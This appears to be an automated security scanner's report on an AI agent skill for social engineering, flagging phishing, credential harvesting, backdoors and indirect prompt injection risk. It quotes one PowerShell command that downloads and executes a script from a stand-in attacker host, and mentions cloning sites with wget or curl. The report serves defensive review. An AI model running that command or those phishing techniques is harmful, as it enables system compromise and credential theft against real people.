performing-social-engineering

CRITICAL E005: Suspicious download URL detected in skill instructions.

• Suspicious download URL detected (high risk: 0.95). The set includes multiple attacker-controlled/ambiguous domains and direct links to executables/scripts (e.g., .exe, .ps1, remote hook.js), credential-harvesting endpoints and tracking pixels alongside a few legitimate references, indicating a high likelihood these URLs can be used to distribute malware or perform malicious actions.

CRITICAL E006: Malicious code pattern detected in skill scripts.

• Malicious code pattern detected (high risk: 1.00). This content provides explicit, actionable instructions and scripts for phishing, credential harvesting, remote payload execution, backdoors, and opsec techniques that enable data exfiltration and system compromise if misused.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 1.00). The skill explicitly instructs fetching and scraping public websites and social media (e.g., "Clone Legitimate Sites" with httrack/wget/curl to download http://legitimate-site.com and the "LinkedIn/Social Media Reconnaissance" section for gathering employee info), so the agent would ingest untrusted, user-generated third‑party content that could enable indirect prompt injection.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

• Potentially malicious external URL detected (high risk: 1.00). The skill includes runtime commands that directly fetch and execute remote code—for example PowerShell IEX((new-object net.webclient).downloadstring('http://attacker.com/payload.ps1'))—so the URL http://attacker.com/payload.ps1 is used at runtime to execute remote code and is a required dependency for the demonstrated payloads.